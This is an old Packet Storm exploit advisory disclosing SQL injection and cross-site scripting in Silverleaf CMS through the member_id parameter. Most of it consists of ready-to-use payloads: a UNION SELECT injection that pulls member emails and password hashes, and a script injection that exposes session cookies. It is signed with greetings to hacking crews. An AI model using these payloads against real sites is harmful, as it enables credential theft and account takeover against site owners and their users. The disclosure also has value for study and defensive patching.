Silverleaf CMS SQL Injection / XSS

2009-08-11T00:00:00
ID PACKETSTORM:80233
Type packetstorm
Reporter trisn
Modified 2009-08-11T00:00:00

Description

                                        
                                            `#################################################  
#  
Silverleaf CMS SQL Injection & XSS Vulnerable #  
#  
#################################################   
  
  
----'' Info '' -----   
  
  
[+] CMS is Silverleaf   
[+] http://silverleafcms.com/   
[+] Injection Part is: member_id=  
  
  
#############################################################################  
  
  
Go Vulnerable like ::  
  
www.silverleafvuln.cms.com/?sec=member&member_id='SQL Injection  
  
SQL Injection ::  
  
  
www.silverleafvuln.cms.com/?sec=member&member_id=1  
  
+and+1=0+union+select+[columns],group_concat(email,0x3a,pwd)+from+members--  
  
#############################################################################  
  
XSS with SQL ERROR for this Injection ::  
  
  
http://www.silverleafvuln.cms.com/?sec=member&member_id=  
  
<script>alert(document.cookie)</script>  
  
PHP Phishing Method over <php echo ... including  
  
#############################################################################  
  
[+] Written & found by trisn  
  
[+] visit acceptthefuture.wordpress.com  
[+] visit free-hack.com  
[+] visit 1nj3ct-Crew  
  
Greetz out to   
  
Lolly, Fred777, _KiNG , big earl   
PAN , Kulverstukas , loverboy , Ice Dragon & Power-Sven -- much more names   
  
  
[6.08.2009] // packetstormsecurity.org  
  
##############################################################################`